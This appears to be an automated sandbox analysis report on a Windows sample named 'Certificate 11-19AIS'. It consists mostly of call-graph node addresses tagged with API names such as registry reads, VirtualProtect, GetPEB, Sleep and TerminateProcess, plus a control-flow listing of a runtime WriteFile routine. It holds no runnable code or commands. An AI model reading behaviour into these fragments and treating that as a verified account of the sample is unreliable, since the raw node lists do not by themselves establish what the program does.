7bce19 48 API calls 95557->95562 95561 7cf4ea 48 API calls 95558->95561 95559->95556 95560->95457 95563 824c04 95561->95563 95562->95560 95564 7cf4ea 48 API calls 95563->95564 95565 824c2a 95564->95565 95565->95560 95566 7bce19 48 API calls 95565->95566 95566->95560 95623->95454 95624->95476 95626->95559 95627->95559 95664 7f6529 95663->95664 95665 7f6cc4 FindFirstFileW 95663->95665 95664->95344 95665->95664 95666 7f6cd9 FindClose 95665->95666 95666->95664 95667->95504 95668->95511 95669->95512 95670->95520 95671->95522 95672->95528 95673->95538 95677 7bbd3f 95676->95677 95680 7bbd5a 95676->95680 95678 7bbdfa 48 API calls 95677->95678 95679 7bbd47 CharUpperBuffW 95678->95679 95679->95680 95680->95365 95682 7b2b8b 95681->95682 95683 82436a 95681->95683 95684 7cf4ea 48 API calls 95682->95684 95685 7b2b92 95684->95685 95686 7b2bb3 95685->95686 95698 7b2bce 48 API calls 95685->95698 95686->95385 95688->95385 95689->95385 95690->95385 95691->95385 95692->95385 95693->95385 95694->95385 95695->95385 95696->95385 95697->95385 95698->95686 95700 7c1d2a 95699->95700 95703 7c1ed6 95699->95703 95701 7c2357 95700->95701 95700->95703 95704 7c1e0b 95700->95704 95709 7c1eba 95700->95709 95701->95709 95722 7f9f44 58 API calls __gmtime64_s 95701->95722 95703->95701 95705 7c1f55 95703->95705 95708 7c1e9a Mailbox 95703->95708 95703->95709 95704->95705 95707 7c1e47 95704->95707 95704->95709 95705->95708 95705->95709 95720 7e97ed InterlockedDecrement 95705->95720 95707->95708 95707->95709 95710 82bfc4 95707->95710 95708->95709 95721 7d203b 58 API calls __wtof_l 95708->95721 95709->95421 95719 7d203b 58 API calls __wtof_l 95710->95719 95713->95421 95714->95423 95715->95423 95716->95416 95717->95409 95718->95424 95719->95709 95720->95708 95721->95709 95722->95709 95724 7b513f __wsetenvp 95723->95724 95725 821b27 95724->95725 95726 7b5151 95724->95726 95728 7b6b4a 48 API calls 95725->95728 95727 7bbb85 48 API calls 95726->95727 95729 7b515e ___crtGetEnvironmentStringsW 95727->95729 95730 821b34 95728->95730 95729->94277 95731 7cee75 48 API calls 95730->95731 95732 821b57 ___crtGetEnvironmentStringsW 95731->95732 95734 7bb392 95733->95734 95741 7bb3c5 ___crtGetEnvironmentStringsW 95733->95741 95735 7bb3b8 95734->95735 95736 7bb3fd 95734->95736 95734->95741 95737 7bbb85 48 API calls 95735->95737 95737->95741 95741->94287 95742->94286 95743 829c06 95754 7cd3be 95743->95754 95745 829c1c 95753 829c91 Mailbox 95745->95753 95763 7b1caa 49 API calls 95745->95763 95747 7c3200 331 API calls 95748 829cc5 95747->95748 95750 82a7ab Mailbox 95748->95750 95765 7fcc5c 86 API calls 4 library calls 95748->95765 95751 829c71 95751->95748 95764 7fb171 48 API calls 95751->95764 95753->95747 95755 7cd3dc 95754->95755 95756 7cd3ca 95754->95756 95758 7cd40b 95755->95758 95759 7cd3e2 95755->95759 95766 7bdcae 50 API calls Mailbox 95756->95766 95767 7bdcae 50 API calls Mailbox 95758->95767 95761 7cf4ea 48 API calls 95759->95761 95760 7cd3d4 95760->95745 95761->95760 95763->95751 95764->95753 95765->95750 95766->95760 95767->95760 95768 7c221a 95769 7c271e 95768->95769 95770 7c2223 95768->95770 95778 7c1eba Mailbox 95769->95778 95779 7ea58f 48 API calls ___crtGetEnvironmentStringsW 95769->95779 95770->95769 95771 7b936c 81 API calls 95770->95771 95772 7c224e 95771->95772 95772->95769 95773 7c225e 95772->95773 95775 7bb384 48 API calls 95773->95775 95775->95778 95776 82be8a 95777 7b6eed 48 API calls 95776->95777 95777->95778 95779->95776 95780 ef2a88 95794 ef06d8 95780->95794 95782 ef2b3e 95797 ef2978 95782->95797 95800 ef3b68 GetPEB 95794->95800 95796 ef0d63 95796->95782 95798 ef2981 Sleep 95797->95798 95799 ef298f 95798->95799 95801 ef3b92 95800->95801 95801->95796 95802 8219cb 95807 7b2322 95802->95807 95804 8219d1 95840 7d0f0a 52 API calls __cinit 95804->95840 95806 8219db 95808 7b2344 95807->95808 95841 7b26df 95808->95841 95813 7bd7f7 48 API calls 95814 7b2384 95813->95814 95815 7bd7f7 48 API calls 95814->95815 95816 7b238e 95815->95816 95817 7bd7f7 48 API calls 95816->95817 95818 7b2398 95817->95818 95819 7bd7f7 48 API calls 95818->95819 95820 7b23de 95819->95820 95821 7bd7f7 48 API calls 95820->95821 95822 7b24c1 95821->95822 95849 7b263f 95822->95849 95826 7b24f1 95827 7bd7f7 48 API calls 95826->95827 95828 7b24fb 95827->95828 95878 7b2745 95828->95878 95830 7b2546 95831 7b2556 GetStdHandle 95830->95831 95832 7b25b1 95831->95832 95833 82501d 95831->95833 95834 7b25b7 CoInitialize 95832->95834 95833->95832 95835 825026 95833->95835 95834->95804 95885 7f92d4 53 API calls 95835->95885 95837 82502d 95886 7f99f9 CreateThread 95837->95886 95839 825039 CloseHandle 95839->95834 95840->95806 95887 7b2854 95841->95887 95844 7b6a63 48 API calls 95845 7b234a 95844->95845 95846 7b272e 95845->95846 95901 7b27ec 6 API calls 95846->95901 95848 7b237a 95848->95813 95850 7bd7f7 48 API calls 95849->95850 95851 7b264f 95850->95851 95852 7bd7f7 48 API calls 95851->95852 95853 7b2657 95852->95853 95902 7b26a7 95853->95902 95856 7b26a7 48 API calls 95857 7b2667 95856->95857 95858 7bd7f7 48 API calls 95857->95858 95859 7b2672 95858->95859 95860 7cf4ea 48 API calls 95859->95860 95861 7b24cb 95860->95861 95862 7b22a4 95861->95862 95863 7b22b2 95862->95863 95864 7bd7f7 48 API calls 95863->95864 95865 7b22bd 95864->95865 95866 7bd7f7 48 API calls 95865->95866 95867 7b22c8 95866->95867 95868 7bd7f7 48 API calls 95867->95868 95869 7b22d3 95868->95869 95870 7bd7f7 48 API calls 95869->95870 95871 7b22de 95870->95871 95872 7b26a7 48 API calls 95871->95872 95873 7b22e9 95872->95873 95874 7cf4ea 48 API calls 95873->95874 95875 7b22f0 95874->95875 95876 7b22f9 RegisterWindowMessageW 95875->95876 95877 821fe7 95875->95877 95876->95826 95879 7b2755 95878->95879 95880 825f4d 95878->95880 95881 7cf4ea 48 API calls 95879->95881 95907 7fc942 50 API calls 95880->95907 95883 7b275d 95881->95883 95883->95830 95884 825f58 95885->95837 95886->95839 95908 7f99df 54 API calls 95886->95908 95894 7b2870 95887->95894 95890 7b2870 48 API calls 95891 7b2864 95890->95891 95892 7bd7f7 48 API calls 95891->95892 95893 7b2716 95892->95893 95893->95844 95895 7bd7f7 48 API calls 95894->95895 95896 7b287b 95895->95896 95897 7bd7f7 48 API calls 95896->95897 95898 7b2883 95897->95898 95899 7bd7f7 48 API calls 95898->95899 95900 7b285c 95899->95900 95900->95890 95901->95848 95903 7bd7f7 48 API calls 95902->95903 95904 7b26b0 95903->95904 95905 7bd7f7 48 API calls 95904->95905 95906 7b265f 95905->95906 95906->95856 95907->95884 95909 7bf030 95912 7c3b70 95909->95912 95911 7bf03c 95913 7c3bc8 95912->95913 95914 7c42a5 95912->95914 95915 7c3bef 95913->95915 95917 826fd1 95913->95917 95920 826f7e 95913->95920 95926 826f9b 95913->95926 96004 7fcc5c 86 API calls 4 library calls 95914->96004 95916 7cf4ea 48 API calls 95915->95916 95918 7c3c18 95916->95918 95992 80ceca 331 API calls Mailbox 95917->95992 95922 7cf4ea 48 API calls 95918->95922 95920->95915 95923 826f87 95920->95923 95921 826fbe 95991 7fcc5c 86 API calls 4 library calls 95921->95991 95939 7c3c2c __wsetenvp ___crtGetEnvironmentStringsW 95922->95939 95989 80d552 331 API calls Mailbox 95923->95989 95926->95921 95990 80da0e 331 API calls 2 library calls 95926->95990 95929 7c3f2b 95929->95911 95930 8273b0 95930->95911 95931 82737a 96010 7fcc5c 86 API calls 4 library calls 95931->96010 95932 827297 96000 7fcc5c 86 API calls 4 library calls 95932->96000 95936 82707e 95993 7fcc5c 86 API calls 4 library calls 95936->95993 95938 7cdce0 53 API calls 95938->95939 95939->95914 95939->95929 95939->95931 95939->95932 95939->95936 95939->95938 95942 7bd6e9 55 API calls 95939->95942 95944 7bd645 53 API calls 95939->95944 95947 8272d2 95939->95947 95948 7c40df 95939->95948 95949 7bfe30 331 API calls 95939->95949 95951 827350 95939->95951 95953 827363 95939->95953 95955 8272e9 95939->95955 95956 7c42f2 95939->95956 95959 7b6a63 48 API calls 95939->95959 95961 82714c 95939->95961 95962 7bd286 48 API calls 95939->95962 95963 7cf4ea 48 API calls 95939->95963 95964 7cc050 48 API calls 95939->95964 95966 82733f 95939->95966 95967 7b6eed 48 API calls 95939->95967 95973 7cee75 48 API calls 95939->95973 95975 8271e1 95939->95975 95984 7bd9a0 53 API calls __cinit 95939->95984 95985 7bd83d 53 API calls 95939->95985 95986 7bcdb9 48 API calls 95939->95986 95987 7cc15c 48 API calls 95939->95987 95988 7cbecb 331 API calls 95939->95988 95994 7bdcae 50 API calls Mailbox 95939->95994 95995 80ccdc 48 API calls 95939->95995 95996 7fa1eb 50 API calls 95939->95996 95942->95939 95944->95939 96002 7fcc5c 86 API calls 4 library calls 95947->96002 96001 7fcc5c 86 API calls 4 library calls 95948->96001 95949->95939 96008 7fcc5c 86 API calls 4 library calls 95951->96008 96009 7fcc5c 86 API calls 4 library calls 95953->96009 96003 7fcc5c 86 API calls 4 library calls 95955->96003 96011 7fcc5c 86 API calls 4 library calls 95956->96011 95959->95939 95997 80ccdc 48 API calls 95961->95997 95962->95939 95963->95939 95964->95939 96007 7fcc5c 86 API calls 4 library calls 95966->96007 95967->95939 95970 8271a1 95999 7cc15c 48 API calls 95970->95999 95973->95939 95975->95929 96006 7fcc5c 86 API calls 4 library calls 95975->96006 95977 82715f 95977->95970 95998 80ccdc 48 API calls 95977->95998 95978 8271ce 95979 7cc050 48 API calls 95978->95979 95981 8271d6 95979->95981 95980 8271ab 95980->95914 95980->95978 95981->95975 95982 827313 95981->95982 96005 7fcc5c 86 API calls 4 library calls 95982->96005 95984->95939 95985->95939 95986->95939 95987->95939 95988->95939 95989->95929 95990->95921 95991->95917 95992->95939 95993->95929 95994->95939 95995->95939 95996->95939 95997->95977 95998->95977 95999->95980 96000->95948 96001->95929 96002->95955 96003->95929 96004->95929 96005->95929 96006->95929 96007->95929 96008->95929 96009->95929 96010->95929 96011->95930 96012 829bec 96045 7c0ae0 Mailbox ___crtGetEnvironmentStringsW 96012->96045 96014 7c1526 Mailbox 96103 7fcc5c 86 API calls 4 library calls 96014->96103 96017 7cf4ea 48 API calls 96044 7bfec8 96017->96044 96018 7c0509 96106 7fcc5c 86 API calls 4 library calls 96018->96106 96019 7c146e 96025 7b6eed 48 API calls 96019->96025 96020 7c1d10 59 API calls 96020->96044 96023 7c1473 96105 7fcc5c 86 API calls 4 library calls 96023->96105 96024 82a922 96041 7bffe1 Mailbox 96025->96041 96027 82a246 96030 7b6eed 48 API calls 96027->96030 96029 7b6eed 48 API calls 96029->96044 96030->96041 96032 7bd7f7 48 API calls 96032->96044 96033 7e97ed InterlockedDecrement 96033->96044 96034 82a873 96035 82a30e 96035->96041 96101 7e97ed InterlockedDecrement 96035->96101 96036 7d0f0a 52 API calls __cinit 96036->96044 96037 7bce19 48 API calls 96037->96045 96039 82a973 96107 7fcc5c 86 API calls 4 library calls 96039->96107 96042 82a982 96043 7c15b5 96104 7fcc5c 86 API calls 4 library calls 96043->96104 96044->96017 96044->96018 96044->96019 96044->96020 96044->96023 96044->96027 96044->96029 96044->96032 96044->96033 96044->96035 96044->96036 96044->96039 96044->96041 96044->96043 96099 7c1820 331 API calls 2 library calls 96044->96099 96045->96014 96045->96037 96045->96041 96045->96044 96046 80e822 331 API calls 96045->96046 96047 7bfe30 331 API calls 96045->96047 96048 82a706 96045->96048 96050 7cf4ea 48 API calls 96045->96050 96051 7e97ed InterlockedDecrement 96045->96051 96052 806ff0 331 API calls 96045->96052 96055 810d09 96045->96055 96058 810d1d 96045->96058 96061 80f0ac 96045->96061 96093 7fa6ef 96045->96093 96100 80ef61 82 API calls 2 library calls 96045->96100 96046->96045 96047->96045 96102 7fcc5c 86 API calls 4 library calls 96048->96102 96050->96045 96051->96045 96052->96045 96108 80f8ae 96055->96108 96057 810d19 96057->96045 96059 80f8ae 129 API calls 96058->96059 96060 810d2d 96059->96060 96060->96045 96062 7bd7f7 48 API calls 96061->96062 96063 80f0c0 96062->96063 96064 7bd7f7 48 API calls 96063->96064 96065 80f0c8 96064->96065 96066 7bd7f7 48 API calls 96065->96066 96067 80f0d0 96066->96067 96068 7b936c 81 API calls 96067->96068 96092 80f0de 96068->96092 96069 7b6a63 48 API calls 96069->96092 96070 7bc799 48 API calls 96070->96092 96071 80f2cc 96074 80f2f9 Mailbox 96071->96074 96210 7b6b68 48 API calls 96071->96210 96073 80f2b3 96077 7b518c 48 API calls 96073->96077 96074->96045 96075 80f2ce 96079 7b518c 48 API calls 96075->96079 96076 7b6eed 48 API calls 96076->96092 96078 80f2c0 96077->96078 96081 7b510d 48 API calls 96078->96081 96082 80f2dd 96079->96082 96080 7bbdfa 48 API calls 96085 80f175 CharUpperBuffW 96080->96085 96081->96071 96083 7b510d 48 API calls 96082->96083 96083->96071 96084 7bbdfa 48 API calls 96086 80f23a CharUpperBuffW 96084->96086 96087 7bd645 53 API calls 96085->96087 96209 7cd922 55 API calls 2 library calls 96086->96209 96087->96092 96089 7b518c 48 API calls 96089->96092 96090 7b936c 81 API calls 96090->96092 96091 7b510d 48 API calls 96091->96092 96092->96069 96092->96070 96092->96071 96092->96073 96092->96074 96092->96075 96092->96076 96092->96080 96092->96084 96092->96089 96092->96090 96092->96091 96094 7fa6fb 96093->96094 96095 7cf4ea 48 API calls 96094->96095 96096 7fa709 96095->96096 96097 7fa717 96096->96097 96098 7bd7f7 48 API calls 96096->96098 96097->96045 96098->96097 96099->96044 96100->96045 96101->96041 96102->96014 96103->96041 96104->96041 96105->96034 96106->96024 96107->96042 96109 7b936c 81 API calls 96108->96109 96110 80f8ea 96109->96110 96115 80f92c Mailbox 96110->96115 96144 810567 96110->96144 96112 80fb8b 96113 80fcfa 96112->96113 96120 80fb95 96112->96120 96192 810688 89 API calls Mailbox 96113->96192 96115->96057 96117 80fd07 96119 80fd13 96117->96119 96117->96120 96118 80f984 Mailbox 96118->96112 96118->96115 96121 7b936c 81 API calls 96118->96121 96188 8129e8 48 API calls ___crtGetEnvironmentStringsW 96118->96188 96189 80fda5 60 API calls 2 library calls 96118->96189 96119->96115 96157 80f70a 96120->96157 96121->96118 96126 80fbc9 96171 7ced18 96126->96171 96129 80fbe3 96190 7fcc5c 86 API calls 4 library calls 96129->96190 96130 80fbfd 96132 7cc050 48 API calls 96130->96132 96134 80fc14 96132->96134 96133 80fbee GetCurrentProcess TerminateProcess 96133->96130 96135 7c1b90 48 API calls 96134->96135 96143 80fc3e 96134->96143 96137 80fc2d 96135->96137 96136 80fd65 96136->96115 96140 80fd7e FreeLibrary 96136->96140 96139 81040f 105 API calls 96137->96139 96138 7c1b90 48 API calls 96138->96143 96139->96143 96140->96115 96143->96136 96143->96138 96175 81040f 96143->96175 96191 7bdcae 50 API calls Mailbox 96143->96191 96145 7bbdfa 48 API calls 96144->96145 96146 810582 CharLowerBuffW 96145->96146 96193 7f1f11 96146->96193 96150 7bd7f7 48 API calls 96151 8105bb 96150->96151 96200 7b69e9 48 API calls ___crtGetEnvironmentStringsW 96151->96200 96153 8105d2 96155 7bb18b 48 API calls 96153->96155 96154 81061a Mailbox 96154->96118 96156 8105de Mailbox 96155->96156 96156->96154 96201 80fda5 60 API calls 2 library calls 96156->96201 96158 80f725 96157->96158 96162 80f77a 96157->96162 96159 7cf4ea 48 API calls 96158->96159 96161 80f747 96159->96161 96160 7cf4ea 48 API calls 96160->96161 96161->96160 96161->96162 96163 810828 96162->96163 96164 810a53 Mailbox 96163->96164 96168 81084b _strcat _wcscpy __wsetenvp 96163->96168 96164->96126 96165 7bd286 48 API calls 96165->96168 96166 7bcf93 58 API calls 96166->96168 96167 7b936c 81 API calls 96167->96168 96168->96164 96168->96165 96168->96166 96168->96167 96169 7d395c 47 API calls __crtGetStringTypeA_stat 96168->96169 96204 7f8035 50 API calls __wsetenvp 96168->96204 96169->96168 96172 7ced2d 96171->96172 96173 7cedc5 VirtualProtect 96172->96173 96174 7ced93 96172->96174 96173->96174 96174->96129 96174->96130 96176 810427 96175->96176 96181 810443 96175->96181 96177 8104f8 96176->96177 96178 81044f 96176->96178 96179 81042e 96176->96179 96176->96181 96208 7f9dc5 103 API calls 96177->96208 96207 7bcdb9 48 API calls 96178->96207 96205 7f7c56 50 API calls _strlen 96179->96205 96180 81051e 96180->96143 96181->96180 96184 7d1c9d _free 47 API calls 96181->96184 96184->96180 96186 810438 96206 7bcdb9 48 API calls 96186->96206 96188->96118 96189->96118 96190->96133 96191->96143 96192->96117 96195 7f1f3b __wsetenvp 96193->96195 96194 7f1f79 96194->96150 96194->96156 96195->96194 96196 7f1ffa 96195->96196 96198 7f1f6f 96195->96198 96196->96194 96203 7cd37a 60 API calls 96196->96203 96198->96194 96202 7cd37a 60 API calls 96198->96202 96200->96153 96201->96154 96202->96198 96203->96196 96204->96168 96205->96186 96206->96181 96207->96181 96208->96181 96209->96092 96210->96074 96211 8219ba 96216 7cc75a 96211->96216 96215 8219c9 96217 7bd7f7 48 API calls 96216->96217 96218 7cc7c8 96217->96218 96225 7cd26c 96218->96225 96220 82ccc3 96222 7cc865 96222->96220 96223 7cc881 96222->96223 96228 7cd1fa 48 API calls ___crtGetEnvironmentStringsW 96222->96228 96224 7d0f0a 52 API calls __cinit 96223->96224 96224->96215 96229 7cd298 96225->96229 96228->96222 96230 7cd28b 96229->96230 96231 7cd2a5 96229->96231 96230->96222 96231->96230 96232 7cd2ac RegOpenKeyExW 96231->96232 96232->96230 96233 7cd2c6 RegQueryValueExW 96232->96233 96234 7cd2fc RegCloseKey 96233->96234 96235 7cd2e7 96233->96235 96234->96230 96235->96234 96236 7b3742 96237 7b374b 96236->96237 96238 7b3769 96237->96238 96239 7b37c8 96237->96239 96280 7b37c6 96237->96280 96242 7b382c PostQuitMessage 96238->96242 96243 7b3776 96238->96243 96240 821e00 96239->96240 96241 7b37ce 96239->96241 96291 7b2ff6 16 API calls 96240->96291 96245 7b37d3 96241->96245 96246 7b37f6 SetTimer RegisterWindowMessageW 96241->96246 96276 7b37b9 96242->96276 96248 821e88 96243->96248 96249 7b3781 96243->96249 96244 7b37ab DefWindowProcW 96244->96276 96250 821da3 96245->96250 96251 7b37da KillTimer 96245->96251 96253 7b381f CreatePopupMenu 96246->96253 96246->96276 96296 7f4ddd 60 API calls _memset 96248->96296 96254 7b3789 96249->96254 96255 7b3836 96249->96255 96263 821da8 96250->96263 96264 821ddc MoveWindow 96250->96264 96288 7b3847 Shell_NotifyIconW _memset 96251->96288 96252 821e27 96292 7ce312 331 API calls Mailbox 96252->96292 96253->96276 96259 821e6d 96254->96259 96260 7b3794 96254->96260 96281 7ceb83 96255->96281 96259->96244 96295 7ea5f3 48 API calls 96259->96295 96266 7b379f 96260->96266 96267 821e58 96260->96267 96261 821e9a 96261->96244 96261->96276 96268 821dcb SetFocus 96263->96268 96269 821dac 96263->96269 96264->96276 96265 7b37ed 96289 7b390f DeleteObject DestroyWindow Mailbox 96265->96289 96266->96244 96293 7b3847 Shell_NotifyIconW _memset 96266->96293 96294 7f55bd 70 API calls _memset 96267->96294 96268->96276 96269->96266 96270 821db5 96269->96270 96290 7b2ff6 16 API calls 96270->96290 96275 821e68 96275->96276 96278 821e4c 96279 7b4ffc 67 API calls 96278->96279 96279->96280 96280->96244 96282 7cec1c 96281->96282 96283 7ceb9a _memset 96281->96283 96282->96276 96284 7b51af 50 API calls 96283->96284 96286 7cebc1 96284->96286 96285 7cec05 KillTimer SetTimer 96285->96282 96286->96285 96287 823c7a Shell_NotifyIconW 96286->96287 96287->96285 96288->96265 96289->96276 96290->96276 96291->96252 96292->96266 96293->96278 96294->96275 96295->96280 96296->96261 96297 82197b 96302 7cdd94 96297->96302 96301 82198a 96303 7cf4ea 48 API calls 96302->96303 96304 7cdd9c 96303->96304 96305 7cddb0 96304->96305 96310 7cdf3d 96304->96310 96309 7d0f0a 52 API calls __cinit 96305->96309 96309->96301 96311 7cdf46 96310->96311 96313 7cdda8 96310->96313 96342 7d0f0a 52 API calls __cinit 96311->96342 96314 7cddc0 96313->96314 96315 7bd7f7 48 API calls 96314->96315 96316 7cddd7 GetVersionExW 96315->96316 96317 7b6a63 48 API calls 96316->96317 96318 7cde1a 96317->96318 96343 7cdfb4 96318->96343 96321 7b6571 48 API calls 96322 7cde2e 96321->96322 96324 8224c8 96322->96324 96347 7cdf77 96322->96347 96326 7cdea4 GetCurrentProcess 96356 7cdf5f LoadLibraryA GetProcAddress 96326->96356 96327 7cdebb 96328 7cdf31 GetSystemInfo 96327->96328 96329 7cdee3 96327->96329 96332 7cdf0e 96328->96332 96350 7ce00c 96329->96350 96334 7cdf1c FreeLibrary 96332->96334 96335 7cdf21 96332->96335 96334->96335 96335->96305 96336 7cdf29 GetSystemInfo 96339 7cdf03 96336->96339 96337 7cdef9 96353 7cdff4 96337->96353 96339->96332 96341 7cdf09 FreeLibrary 96339->96341 96341->96332 96342->96313 96344 7cdfbd 96343->96344 96345 7bb18b 48 API calls 96344->96345 96346 7cde22 96345->96346 96346->96321 96357 7cdf89 96347->96357 96361 7ce01e 96350->96361 96354 7ce00c 2 API calls 96353->96354 96355 7cdf01 GetNativeSystemInfo 96354->96355 96355->96339 96356->96327 96358 7cdea0 96357->96358 96359 7cdf92 LoadLibraryA 96357->96359 96358->96326 96358->96327 96359->96358 96360 7cdfa3 GetProcAddress 96359->96360 96360->96358 96362 7cdef1 96361->96362 96363 7ce027 LoadLibraryA 96361->96363 96362->96336 96362->96337 96363->96362 96364 7ce038 GetProcAddress 96363->96364 96364->96362 96365 828eb8 96369 7fa635 96365->96369 96367 828ec3 96368 7fa635 84 API calls 96367->96368 96368->96367 96370 7fa642 96369->96370 96379 7fa66f 96369->96379 96371 7fa671 96370->96371 96372 7fa676 96370->96372 96377 7fa669 96370->96377 96370->96379 96381 7cec4e 81 API calls 96371->96381 96374 7b936c 81 API calls 96372->96374 96375 7fa67d 96374->96375 96376 7b510d 48 API calls 96375->96376 96376->96379 96380 7c4525 61 API calls ___crtGetEnvironmentStringsW 96377->96380 96379->96367 96380->96379 96381->96372 96382 7bef80 96383 7c3b70 331 API calls 96382->96383 96384 7bef8c 96383->96384 96385 8219dd 96390 7b4a30 96385->96390 96387 8219f1 96410 7d0f0a 52 API calls __cinit 96387->96410 96389 8219fb 96391 7b4a40 __ftell_nolock 96390->96391 96392 7bd7f7 48 API calls 96391->96392 96393 7b4af6 96392->96393 96394 7b5374 50 API calls 96393->96394 96395 7b4aff 96394->96395 96411 7b363c 96395->96411 96398 7b518c 48 API calls 96399 7b4b18 96398->96399 96400 7b64cf 48 API calls 96399->96400 96401 7b4b29 96400->96401 96402 7bd7f7 48 API calls 96401->96402 96403 7b4b32 96402->96403 96417 7b49fb 96403->96417 96405 7b4b43 Mailbox 96405->96387 96406 7b61a6 48 API calls 96409 7b4b3d _wcscat Mailbox __wsetenvp 96406->96409 96407 7bce19 48 API calls 96407->96409 96408 7b64cf 48 API calls 96408->96409 96409->96405 96409->96406 96409->96407 96409->96408 96410->96389 96412 7b3649 __ftell_nolock 96411->96412 96431 7b366c GetFullPathNameW 96412->96431 96414 7b365a 96415 7b6a63 48 API calls 96414->96415 96416 7b3669 96415->96416 96416->96398 96433 7bbcce 96417->96433 96420 7b4a2b 96420->96409 96421 8241cc RegQueryValueExW 96422 824246 RegCloseKey 96421->96422 96423 8241e5 96421->96423 96424 7cf4ea 48 API calls 96423->96424 96425 8241fe 96424->96425 96426 7b47b7 48 API calls 96425->96426 96427 824208 RegQueryValueExW 96426->96427 96428 824224 96427->96428 96429 82423b 96427->96429 96430 7b6a63 48 API calls 96428->96430 96429->96422 96430->96429 96432 7b368a 96431->96432 96432->96414 96434 7bbce8 96433->96434 96438 7b4a0a RegOpenKeyExW 96433->96438 96435 7cf4ea 48 API calls 96434->96435 96436 7bbcf2 96435->96436 96437 7cee75 48 API calls 96436->96437 96437->96438 96438->96420 96438->96421

                                                                              Executed Functions

                                                                              Function 007DB043 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 744 7db043-7db080 call 7df8a0 747 7db089-7db08b 744->747 748 7db082-7db084 744->748 750 7db08d-7db0a7 call 7d7bda call 7d7c0e call 7d6e10 747->750 751 7db0ac-7db0d9 747->751 749 7db860-7db86c call 7da70c 748->749 750->749 754 7db0db-7db0de 751->754 755 7db0e0-7db0e7 751->755 754->755 758 7db10b-7db110 754->758 759 7db0e9-7db100 call 7d7bda call 7d7c0e call 7d6e10 755->759 760 7db105 755->760 762 7db11f-7db12d call 7e3bf2 758->762 763 7db112-7db11c call 7df82f 758->763 789 7db851-7db854 759->789 760->758 775 7db44b-7db45d 762->775 776 7db133-7db145 762->776 763->762 779 7db7b8-7db7d5 WriteFile 775->779 780 7db463-7db473 775->780 776->775 778 7db14b-7db183 call 7d7a0d GetConsoleMode 776->778 778->775 794 7db189-7db18f 778->794 784 7db7d7-7db7df 779->784 785 7db7e1-7db7e7 GetLastError 779->785 781 7db479-7db484 780->781 782 7db55a-7db55f 780->782 787 7db81b-7db833 781->787 788 7db48a-7db49a 781->788 791 7db565-7db56e 782->791 792 7db663-7db66e 782->792 790 7db7e9 784->790 785->790 796 7db83e-7db84e call 7d7c0e call 7d7bda 787->796 797 7db835-7db838 787->797 795 7db4a0-7db4a3 788->795 801 7db85e-7db85f 789->801 799 7db7ef-7db7f1 790->799 791->787 800 7db574 791->800 792->787 798 7db674 792->798 802 7db199-7db1bc GetConsoleCP 794->802 803 7db191-7db193 794->803 804 7db4e9-7db520 WriteFile 795->804 805 7db4a5-7db4be 795->805 796->789 797->796 806 7db83a-7db83c 797->806 807 7db67e-7db693 798->807 809 7db856-7db85c 799->809 810 7db7f3-7db7f5 799->810 811 7db57e-7db595 800->811 801->749 812 7db440-7db446 802->812 813 7db1c2-7db1ca 802->813 803->775 803->802 804->785 816 7db526-7db538 804->816 814 7db4cb-7db4e7 805->814 815 7db4c0-7db4ca 805->815 806->801 817 7db699-7db69b 807->817 809->801 810->787 819 7db7f7-7db7fc 810->819 820 7db59b-7db59e 811->820 812->810 821 7db1d4-7db1d6 813->821 814->795 814->804 815->814 816->799 822 7db53e-7db54f 816->822 823 7db69d-7db6b3 817->823 824 7db6d8-7db719 WideCharToMultiByte 817->824 826 7db7fe-7db810 call 7d7c0e call 7d7bda 819->826 827 7db812-7db819 call 7d7bed 819->827 828 7db5de-7db627 WriteFile 820->828 829 7db5a0-7db5b6 820->829 834 7db1dc-7db1fe 821->834 835 7db36b-7db36e 821->835 822->788 836 7db555 822->836 837 7db6b5-7db6c4 823->837 838 7db6c7-7db6d6 823->838 824->785 840 7db71f-7db721 824->840 826->789 827->789 828->785 833 7db62d-7db645 828->833 830 7db5cd-7db5dc 829->830 831 7db5b8-7db5ca 829->831 830->820 830->828 831->830 833->799 843 7db64b-7db658 833->843 844 7db217-7db223 call 7d1688 834->844 845 7db200-7db215 834->845 846 7db375-7db3a2 835->846 847 7db370-7db373 835->847 836->799 837->838 838->817 838->824 848 7db727-7db75a WriteFile 840->848 843->811 853 7db65e 843->853 868 7db269-7db26b 844->868 869 7db225-7db239 844->869 854 7db271-7db283 call 7e40f7 845->854 856 7db3a8-7db3ab 846->856 847->846 847->856 850 7db75c-7db776 848->850 851 7db77a-7db78e GetLastError 848->851 850->848 857 7db778 850->857 860 7db794-7db796 851->860 853->799 871 7db289 854->871 872 7db435-7db43b 854->872 862 7db3ad-7db3b0 856->862 863 7db3b2-7db3c5 call 7e5884 856->863 857->860 860->790 867 7db798-7db7b0 860->867 862->863 864 7db407-7db40a 862->864 863->785 877 7db3cb-7db3d5 863->877 864->821 874 7db410 864->874 867->807 873 7db7b6 867->873 868->854 875 7db23f-7db254 call 7e40f7 869->875 876 7db412-7db42d 869->876 878 7db28f-7db2c4 WideCharToMultiByte 871->878 872->790 873->799 874->872 875->872 886 7db25a-7db267 875->886 876->872 880 7db3fb-7db401 877->880 881 7db3d7-7db3ee call 7e5884 877->881 878->872 882 7db2ca-7db2f0 WriteFile 878->882 880->864 881->785 889 7db3f4-7db3f5 881->889 882->785 885 7db2f6-7db30e 882->885 885->872 888 7db314-7db31b 885->888 886->878 888->880 890 7db321-7db34c WriteFile 888->890 889->880 890->785 891 7db352-7db359 890->891 891->872 892 7db35f-7db366 891->892 892->880
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
